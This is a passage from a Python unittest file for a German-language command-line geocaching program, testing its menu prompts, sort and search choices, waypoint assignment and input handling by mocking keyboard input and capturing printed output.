output = out.getvalue() # save value of out in output
self.assertEqual(output, "hello\n")
def test_textwithcapitalsandnumbers(self):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.general_output("hEllo2") # fill out
output = out.getvalue() # save value of out in output
self.assertEqual(output, "hEllo2\n")
def test_umlauts(self):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.general_output("m{}rchen".format("\u00E4")) # fill out
output = out.getvalue() # save value of out in output
self.assertEqual(output, "m{}rchen\n".format("\u00E4"))
def test_replacable_signs(self):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.general_output("hello {}".format("\u263a")) # fill out
output = out.getvalue() # save value of out in output
self.assertEqual(output, "hello :-)\n")
def test_unknown_signs(self):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.general_output("Flag Turkey: {}".format("\u262a")) # fill out
output = out.getvalue() # save value of out in output
self.assertEqual(output, "Flag Turkey: {}\n".format("\u001a"))
class TestGeneralInput(unittest.TestCase):
def test_normaltext(self):
with mock.patch('builtins.input', return_value="hello"):
self.assertEqual(user_io.general_input(">> "), 'hello')
def test_textwithcapitalsandnumbers(self):
with mock.patch('builtins.input', return_value="hEllo2"):
self.assertEqual(user_io.general_input(">> "), 'hEllo2')
def test_replacable_signs(self):
with mock.patch('builtins.input', return_value="hello {}".format("\u263a")):
self.assertEqual(user_io.general_input(">> "), "hello {}".format("\u263a"))
def test_umlauts(self):
with mock.patch('builtins.input', return_value="m{}rchen".format("\u00E4")):
self.assertEqual(user_io.general_input(">> "), "m{}rchen".format("\u00E4"))
def test_unknown_signs(self):
with mock.patch('builtins.input', return_value="Flag Turkey: {}".format("\u262a")):
self.assertEqual(user_io.general_input(">> "), "Flag Turkey: {}".format("\u262a"))
def test_number(self):
with mock.patch('builtins.input', return_value="42"):
self.assertEqual(user_io.general_input(">> "), "42")
class TestShowMainMenu(unittest.TestCase):
def test_nofoundexists(self):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.show_main_menu(False) # fill out
output = out.getvalue() # save value of out in output
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Geocaches aktualisieren\n"
expected += "2: Alle auf dem Geraet gespeicherten Geocaches sortieren und anzeigen\n"
expected += "3: Wegpunkt-Menue\n"
expected += "4: Karten-Menue\n"
expected += "5: Beschreibung fuer einen bestimmten Cache anzeigen (GC-Code erforderlich)\n"
expected += "6: Geocaches durchsuchen\n"
expected += "7: Programm verlassen\n"
self.assertEqual(output, expected)
def test_foundexists(self):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.show_main_menu(True) # fill out
output = out.getvalue() # save value of out in output
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Geocaches aktualisieren\n"
expected += "2: Alle auf dem Geraet gespeicherten Geocaches sortieren und anzeigen\n"
expected += "3: Wegpunkt-Menue\n"
expected += "4: Karten-Menue\n"
expected += "5: Beschreibung fuer einen bestimmten Cache anzeigen (GC-Code erforderlich)\n"
expected += "6: Geocaches durchsuchen\n"
expected += "7: Alle gefundenen Caches anzeigen\n"
expected += "8: Programm verlassen\n"
self.assertEqual(output, expected)
class TestMainMenu(unittest.TestCase):
def test_1_nofoundexists(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.main_menu(False), 'update')
def test_2_nofoundexists(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.main_menu(False), 'show_all')
def test_3_nofoundexists(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.main_menu(False), 'show_waypoints')
def test_4_nofoundexists(self):
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.main_menu(False), 'map-menu')
def test_5_nofoundexists(self):
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.main_menu(False), 'show_one')
def test_6_nofoundexists(self):
with mock.patch('builtins.input', return_value="6"):
self.assertEqual(user_io.main_menu(False), 'search')
def test_7_nofoundexists(self):
with mock.patch('builtins.input', return_value="7"):
self.assertEqual(user_io.main_menu(False), 'exit')
def test_11_nofoundexists(self):
with mock.patch('builtins.input', return_value="11"):
self.assertEqual(user_io.main_menu(False), None)
def test_1_foundexists(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.main_menu(True), 'update')
def test_2_foundexists(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.main_menu(True), 'show_all')
def test_3_foundexists(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.main_menu(False), 'show_waypoints')
def test_4_foundexists(self):
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.main_menu(True), 'map-menu')
def test_5_foundexists(self):
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.main_menu(True), 'show_one')
def test_6_foundexists(self):
with mock.patch('builtins.input', return_value="6"):
self.assertEqual(user_io.main_menu(True), 'search')
def test_7_foundexists(self):
with mock.patch('builtins.input', return_value="7"):
self.assertEqual(user_io.main_menu(True), 'show_founds')
def test_8_foundexists(self):
with mock.patch('builtins.input', return_value="8"):
self.assertEqual(user_io.main_menu(True), 'exit')
class TestMapMenu(unittest.TestCase):
def test_output(self):
with mock.patch('builtins.input', return_value="any bullshit"):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.map_menu() # fill out
output = out.getvalue() # save value of out in output
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Alle auf dem Geraet gespeicherten Geocaches auf Karte zeigen (INTERNET!!!)\n"
expected += "2: https://www.geocaching.com/map aufrufen (INTERNET!!!)\n"
expected += "3: https://www.google.de/maps aufrufen (INTERNET!!!)\n"
self.assertEqual(output, expected)
def test_1(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.map_menu(), 'show_on_map')
def test_2(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.map_menu(), 'gc-maps')
def test_3(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.map_menu(), 'google-maps')
def test_bullshit(self):
with mock.patch('builtins.input', return_value="blub"):
self.assertIsNone(user_io.map_menu())
class TestSortCaches(unittest.TestCase):
def test_gccode(self):
with mock.patch('builtins.input', side_effect=['1', '1']):
self.assertEqual(user_io.sort_caches(), ["gccode", False])
def test_name(self):
with mock.patch('builtins.input', side_effect=['2', '1']):
self.assertEqual(user_io.sort_caches(), ["name", False])
def test_type(self):
with mock.patch('builtins.input', side_effect=['3', '1']):
self.assertEqual(user_io.sort_caches(), ["type", False])
def test_difficulty(self):
with mock.patch('builtins.input', side_effect=['4', '1']):
self.assertEqual(user_io.sort_caches(), ["difficulty", False])
def test_terrain(self):
with mock.patch('builtins.input', side_effect=['5', '1']):
self.assertEqual(user_io.sort_caches(), ["terrain", False])
def test_size(self):
with mock.patch('builtins.input', side_effect=['6', '1']):
self.assertEqual(user_io.sort_caches(), ["size", False])
def test_downloaddate(self):
with mock.patch('builtins.input', side_effect=['7', '1']):
self.assertEqual(user_io.sort_caches(), ["downloaddate", False])
def test_available(self):
with mock.patch('builtins.input', side_effect=['8', '1']):
self.assertEqual(user_io.sort_caches(), ["available", False])
def test_distance(self):
with mock.patch('builtins.input', side_effect=['9', '1']):
self.assertEqual(user_io.sort_caches(), ["distance", False])
def test_gccode_backwards(self):
with mock.patch('builtins.input', side_effect=['1', '2']):
self.assertEqual(user_io.sort_caches(), ["gccode", True])
def test_name_backwards(self):
with mock.patch('builtins.input', side_effect=['2', '2']):
self.assertEqual(user_io.sort_caches(), ["name", True])
def test_type_backwards(self):
with mock.patch('builtins.input', side_effect=['3', '2']):
self.assertEqual(user_io.sort_caches(), ["type", True])
def test_difficulty_backwards(self):
with mock.patch('builtins.input', side_effect=['4', '2']):
self.assertEqual(user_io.sort_caches(), ["difficulty", True])
def test_terrain_backwards(self):
with mock.patch('builtins.input', side_effect=['5', '2']):
self.assertEqual(user_io.sort_caches(), ["terrain", True])
def test_size_backwards(self):
with mock.patch('builtins.input', side_effect=['6', '2']):
self.assertEqual(user_io.sort_caches(), ["size", True])
def test_downloaddate_backwards(self):
with mock.patch('builtins.input', side_effect=['7', '2']):
self.assertEqual(user_io.sort_caches(), ["downloaddate", True])
def test_available_backwards(self):
with mock.patch('builtins.input', side_effect=['8', '2']):
self.assertEqual(user_io.sort_caches(), ["available", True])
def test_distance_backwards(self):
with mock.patch('builtins.input', side_effect=['9', '2']):
self.assertEqual(user_io.sort_caches(), ["distance", True])
def test_criterion0(self):
with mock.patch('builtins.input', side_effect=['0', '2']):
self.assertEqual(user_io.sort_caches(), ["gccode", True])
def test_criterion_invalid(self):
with mock.patch('builtins.input', side_effect=['bla', '1']):
self.assertEqual(user_io.sort_caches(), ["gccode", False])
def test_revert_invalid(self):
with mock.patch('builtins.input', side_effect=['1', '0']):
self.assertEqual(user_io.sort_caches(), ["gccode", False])
def test_output_normal(self):
with mock.patch('builtins.input', side_effect=['3', '2']):
out = StringIO()
sys.stdout = out
user_io.sort_caches()
output = out.getvalue()
expected = "\nWonach sollen die Geocaches sortiert werden?\n"
expected += "1: GC-Code\n"
expected += "2: Name\n"
expected += "3: Cache-Typ\n"
expected += "4: D-Wertung\n"
expected += "5: T-Wertung\n"
expected += "6: Groesse\n"
expected += "7: Download-Datum\n"
expected += "8: Verfuegbarkeit\n"
expected += "9: Abstand von einer bestimmten Position (Koordinaten erforderlich)\n"
expected += "In welche Richtung sollen die Caches sortiert werden?\n"
expected += "1: aufsteigend\n"
expected += "2: absteigend\n"
self.assertEqual(output, expected)
def test_output_criterion_invalid(self):
with mock.patch('builtins.input', side_effect=['0', '2']):
out = StringIO()
sys.stdout = out
user_io.sort_caches()
output = out.getvalue()
expected = "\nWonach sollen die Geocaches sortiert werden?\n"
expected += "1: GC-Code\n"
expected += "2: Name\n"
expected += "3: Cache-Typ\n"
expected += "4: D-Wertung\n"
expected += "5: T-Wertung\n"
expected += "6: Groesse\n"
expected += "7: Download-Datum\n"
expected += "8: Verfuegbarkeit\n"
expected += "9: Abstand von einer bestimmten Position (Koordinaten erforderlich)\n"
expected += "Ungueltige Eingabe: Sortierung erfolgt nach GC-Code\n"
expected += "In welche Richtung sollen die Caches sortiert werden?\n"
expected += "1: aufsteigend\n"
expected += "2: absteigend\n"
self.assertEqual(output, expected)
class TestSearch(unittest.TestCase):
def test_name(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.search(), "name")
def test_description(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.search(), "description")
def test_type(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.search(), "type")
def test_difficulty(self):
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.search(), "difficulty")
def test_terrain(self):
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.search(), "terrain")
def test_size(self):
with mock.patch('builtins.input', return_value="6"):
self.assertEqual(user_io.search(), "size")
def test_downloaddate(self):
with mock.patch('builtins.input', return_value="7"):
self.assertEqual(user_io.search(), "downloaddate")
def test_available(self):
with mock.patch('builtins.input', return_value="8"):
self.assertEqual(user_io.search(), "available")
def test_attribute(self):
with mock.patch('builtins.input', return_value="9"):
self.assertEqual(user_io.search(), "attribute")
def test_distance(self):
with mock.patch('builtins.input', return_value="10"):
self.assertEqual(user_io.search(), "distance")
def test_0(self):
with mock.patch('builtins.input', return_value="0"):
self.assertEqual(user_io.search(), None)
def test_invalid(self):
with mock.patch('builtins.input', return_value="bla"):
self.assertEqual(user_io.search(), None)
def test_output_normal(self):
with mock.patch('builtins.input', return_value="2"):
out = StringIO()
sys.stdout = out
user_io.search()
output = out.getvalue()
expected = "\nWonach willst du suchen?\n"
expected += "1: Name\n"
expected += "2: Beschreibung\n"
expected += "3: Cache-Typ\n"
expected += "4: D-Wertung\n"
expected += "5: T-Wertung\n"
expected += "6: Groesse\n"
expected += "7: Download-Datum\n"
expected += "8: Verfuegbarkeit\n"
expected += "9: Attribut\n"
expected += "10: Abstand von einer bestimmten Position (Koordinaten erforderlich)\n"
self.assertEqual(output, expected)
def test_output_invalid(self):
with mock.patch('builtins.input', return_value="bla"):
out = StringIO()
sys.stdout = out
user_io.search()
output = out.getvalue()
expected = "\nWonach willst du suchen?\n"
expected += "1: Name\n"
expected += "2: Beschreibung\n"
expected += "3: Cache-Typ\n"
expected += "4: D-Wertung\n"
expected += "5: T-Wertung\n"
expected += "6: Groesse\n"
expected += "7: Download-Datum\n"
expected += "8: Verfuegbarkeit\n"
expected += "9: Attribut\n"
expected += "10: Abstand von einer bestimmten Position (Koordinaten erforderlich)\n"
expected += "Ungueltige Eingabe\n"
self.assertEqual(output, expected)
class TestSearchType(unittest.TestCase):
def test_return(self):
with mock.patch('builtins.input', return_value="Traditional Cache"):
self.assertEqual(user_io.search_type(), "Traditional Cache")
def test_output(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.search_type()
output = out.getvalue()
expected = "Gib den Cachetyp ein, nach dem du suchen willst.\n"
expected += "Moegliche Typen: Traditional Cache, Multi-cache, Mystery Cache, EarthCache, "
expected += "Letterbox Hybrid, Event Cache, Wherigo Cache, Geocaching HQ, Unknown Type\n"
expected += "Achtung! Gross- und Kleinschreibung beachten!\n"
self.assertEqual(output, expected)
class TestSearchAttribute(unittest.TestCase):
def test_return(self):
with mock.patch('builtins.input', return_value="does not need to be an attr"):
self.assertEqual(user_io.search_attribute(["attr1", "attr2"]), "does not need to be an attr")
def test_output(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.search_attribute(["attr1", "attr2"])
output = out.getvalue()
expected = "Gib das Attribut ein, nach dem du suchen willst.\n"
expected += "Moegliche Attribute: attr1, attr2\n"
self.assertEqual(output, expected)
class TestActionsAfterSearch(unittest.TestCase):
def test_1(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.actions_after_search(), "show_again")
def test_2(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.actions_after_search(), "delete")
def test_3(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.actions_after_search(), "show_on_map")
def test_4(self):
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.actions_after_search(), "show_one")
def test_5(self):
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.actions_after_search(), "back")
def test_other(self):
with mock.patch('builtins.input', return_value="0"):
self.assertEqual(user_io.actions_after_search(), None)
def test_output(self):
with mock.patch('builtins.input', return_value="1"):
out = StringIO()
sys.stdout = out
user_io.actions_after_search()
output = out.getvalue()
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Alle Suchergebnisse erneut anzeigen (bei evtl. Loeschen nicht aktualisiert)\n"
expected += "2: Alle Suchergebnisse loeschen\n"
expected += "3: Alle Suchergebnisse auf Karte zeigen (INTERNET!!!)\n"
expected += "4: Beschreibung fuer eines der Suchergebnisse anzeigen\n"
expected += "5: zurueck\n"
self.assertEqual(output, expected)
def test_output_invalid_input(self):
with mock.patch('builtins.input', return_value="bla"):
out = StringIO()
sys.stdout = out
user_io.actions_after_search()
output = out.getvalue()
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Alle Suchergebnisse erneut anzeigen (bei evtl. Loeschen nicht aktualisiert)\n"
expected += "2: Alle Suchergebnisse loeschen\n"
expected += "3: Alle Suchergebnisse auf Karte zeigen (INTERNET!!!)\n"
expected += "4: Beschreibung fuer eines der Suchergebnisse anzeigen\n"
expected += "5: zurueck\n"
expected += "Ungueltige Eingabe\n"
self.assertEqual(output, expected)
class TestActionsWithFounds(unittest.TestCase):
def test_1(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.actions_with_founds(), "log")
def test_2(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.actions_with_founds(), "delete")
def test_3(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.actions_with_founds(), "exit")
def test_other(self):
with mock.patch('builtins.input', return_value="0"):
self.assertEqual(user_io.actions_after_search(), None)
def test_output(self):
with mock.patch('builtins.input', return_value="3"):
out = StringIO()
sys.stdout = out
user_io.actions_with_founds()
output = out.getvalue()
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Gefundene Caches auf geocaching.com loggen "
expected += "(ueber den Upload von drafts / fieldnotes, INTERNET!!!)\n"
expected += "2: Alle gefundenen Caches loeschen\n"
expected += "3: zurueck\n"
self.assertEqual(output, expected)
class TestConfirmDeletion(unittest.TestCase):
def test_yes(self):
with mock.patch('builtins.input', return_value="y"):
self.assertEqual(user_io.confirm_deletion(), True)
def test_no(self):
with mock.patch('builtins.input', return_value="n"):
self.assertEqual(user_io.confirm_deletion(), False)
def test_nonsense(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
self.assertEqual(user_io.confirm_deletion(), False)
class TestWaypointMenu(unittest.TestCase):
def test_output_no_waypoints(self):
with mock.patch('builtins.input', return_value="any bullshit"):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.waypoint_menu(False) # fill out
output = out.getvalue() # save value of out in output
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Wegpunkte hinzufuegen\n"
expected += "2: nichts\n"
self.assertEqual(output, expected)
def test_output_waypoints(self):
with mock.patch('builtins.input', return_value="any bullshit"):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.waypoint_menu(True) # fill out
output = out.getvalue() # save value of out in output
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Wegpunkte hinzufuegen\n"
expected += "2: Wegpunkte zu Geocaches zuordnen oder loeschen\n"
expected += "3: nichts\n"
self.assertEqual(output, expected)
def test_no_waypoints_1(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.waypoint_menu(False), 'add')
def test_no_waypoints_2(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.waypoint_menu(False), 'continue')
def test_no_waypoints_shit(self):
with mock.patch('builtins.input', return_value="shit"):
self.assertEqual(user_io.waypoint_menu(False), 'continue')
def test_waypoints_1(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.waypoint_menu(True), 'add')
def test_waypoints_2(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.waypoint_menu(True), 'assign')
def test_no_waypoints_3(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.waypoint_menu(True), 'continue')
class TestChooseCache(unittest.TestCase):
def test_bullshit_suggestions_give_error(self):
self.assertRaises(TypeError, user_io.choose_cache, "bla", False)
def test_no_suggestions_no_more_options_output(self):
with mock.patch('builtins.input', return_value="any bullshit"):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.choose_cache([], False) # fill out
output = out.getvalue() # save value of out in output
expected = "Keine Vorschlaege vorhanden. Was nun?\n"
expected += "1: zu anderem Geocache zuordnen (GC-Code erforderlich)\n"
expected += "2: Wegpunkt doch nicht zuordnen\n"
self.assertEqual(output, expected)
def test_no_suggestions_more_options_output(self):
with mock.patch('builtins.input', return_value="any bullshit"):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.choose_cache([], True) # fill out
output = out.getvalue() # save value of out in output
expected = "Keine Vorschlaege vorhanden. Was nun?\n"
expected += "1: zu anderem Geocache zuordnen (GC-Code erforderlich)\n"
expected += "2: Wegpunkt loeschen\n"
expected += "3: nichts tun\n"
self.assertEqual(output, expected)
def test_no_suggestions_no_more_options_1(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.choose_cache([], False), 'other')
def test_no_suggestions_no_more_options_2(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.choose_cache([], False), 'continue')
def test_no_suggestions_no_more_options_3(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.choose_cache([], False), 'continue')
def test_no_suggestions_more_options_1(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.choose_cache([], True), 'other')
def test_no_suggestions_more_options_2(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.choose_cache([], True), 'delete')
def test_no_suggestions_more_options_3(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.choose_cache([], True), 'continue')
def test_suggestions_no_more_options_output(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="any bullshit"):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.choose_cache([gc1, gc2, gc3], False) # fill out
output = out.getvalue() # save value of out in output
expected = "Zu welchem der folgenden Caches moechtest du den Wegpunkt zuordnen?\n"
expected += "1: Cachertreffen Würzburg, die 54ste (GC78K5W)\n"
expected += "2: Saaletalblick (GC6K86W)\n"
expected += "3: Hochschule für Musik 1 (GC6RNTX)\n"
expected += "4: zu anderem Geocache zuordnen (GC-Code erforderlich)\n"
expected += "5: Wegpunkt doch nicht zuordnen\n"
self.assertEqual(output, expected)
def test_suggestions_more_options_output(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="any bullshit"):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.choose_cache([gc1, gc2, gc3], True) # fill out
output = out.getvalue() # save value of out in output
expected = "Zu welchem der folgenden Caches moechtest du den Wegpunkt zuordnen?\n"
expected += "1: Cachertreffen Würzburg, die 54ste (GC78K5W)\n"
expected += "2: Saaletalblick (GC6K86W)\n"
expected += "3: Hochschule für Musik 1 (GC6RNTX)\n"
expected += "4: zu anderem Geocache zuordnen (GC-Code erforderlich)\n"
expected += "5: Wegpunkt loeschen\n"
expected += "6: nichts tun\n"
self.assertEqual(output, expected)
def test_suggestions_no_more_options_1(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], False), gc1)
def test_suggestions_no_more_options_2(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], False), gc2)
def test_suggestions_no_more_options_3(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], False), gc3)
def test_suggestions_no_more_options_4(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], False), "other")
def test_suggestions_no_more_options_5(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], False), "continue")
def test_suggestions_no_more_options_6(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="6"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], False), "continue")
def test_suggestions_more_options_1(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], True), gc1)
def test_suggestions_more_options_2(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], True), gc2)
def test_suggestions_more_options_3(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], True), gc3)
def test_suggestions_more_options_4(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], True), "other")
def test_suggestions_more_options_5(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], True), "delete")
def test_suggestions_more_options_6(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="6"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], True), "continue")
class TestShowOne(unittest.TestCase):
def test_1_no_waypoints(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.show_one(False), "delete")
def test_2_no_waypoints(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.show_one(False), "gc.com")
def test_3_no_waypoints(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.show_one(False), "dist")
def test_4_no_waypoints(self):
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.show_one(False), "gc-map")
def test_5_no_waypoints(self):
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.show_one(False), "googlemaps")
def test_6_no_waypoints(self):
with mock.patch('builtins.input', return_value="6"):
self.assertEqual(user_io.show_one(False), None)
def test_other_no_waypoints(self):
with mock.patch('builtins.input', return_value="0"):
self.assertEqual(user_io.show_one(False), None)
def test_output_no_waypoints(self):
with mock.patch('builtins.input', return_value="bla"):
out = StringIO()
sys.stdout = out
user_io.show_one(False)
output = out.getvalue()
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: diesen Cache loeschen\n"
expected += "2: diesen Cache auf geocaching.com oeffnen (INTERNET!!!)\n"
expected += "3: Abstand dieses Caches zu einer bestimmten Position berechnen\n"
expected += "4: Position des Caches auf der Karte "
expected += "https://www.geocaching.com/map anzeigen (INTERNET!!!)\n"
expected += "5: Position des Caches auf der Karte https://www.google.de/maps anzeigen (INTERNET!!!)\n"
expected += "6: zurueck\n"
self.assertEqual(output, expected)
def test_1_waypoints(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.show_one(True), "delete")
def test_2_waypoints(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.show_one(True), "gc.com")
def test_3_waypoints(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.show_one(True), "dist")
def test_4_waypoints(self):
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.show_one(True), "gc-map")
def test_5_waypoints(self):
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.show_one(True), "googlemaps")
def test_6_waypoints(self):
with mock.patch('builtins.input', return_value="6"):
self.assertEqual(user_io.show_one(True), "mapcustomizer")
def test_7_waypoints(self):
with mock.patch('builtins.input', return_value="7"):
self.assertEqual(user_io.show_one(True), None)
def test_other_waypoints(self):
with mock.patch('builtins.input', return_value="0"):
self.assertEqual(user_io.show_one(True), None)
def test_output_waypoints(self):
with mock.patch('builtins.input', return_value="bla"):
out = StringIO()
sys.stdout = out
user_io.show_one(True)
output = out.getvalue()
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: diesen Cache loeschen\n"
expected += "2: diesen Cache auf geocaching.com oeffnen (INTERNET!!!)\n"
expected += "3: Abstand dieses Caches zu einer bestimmten Position berechnen\n"
expected += "4: Position des Caches auf der Karte "
expected += "https://www.geocaching.com/map anzeigen (INTERNET!!!)\n"
expected += "5: Position des Caches auf der Karte https://www.google.de/maps anzeigen (INTERNET!!!)\n"
expected += "6: diesen Cache mit allen Wegpunkten auf Karte zeigen (INTERNET!!!)\n"
expected += "7: zurueck\n"
self.assertEqual(output, expected)
class TestCoordinatesInput(unittest.TestCase):
def test_return(self):
with mock.patch('builtins.input', return_value="X XX\xb0XX.XXX, X XXX\xb0XX.XXX"):
self.assertEqual(user_io.coordinates_input(), "X XX°XX.XXX, X XXX°XX.XXX")
def test_output(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.coordinates_input()
output = out.getvalue()
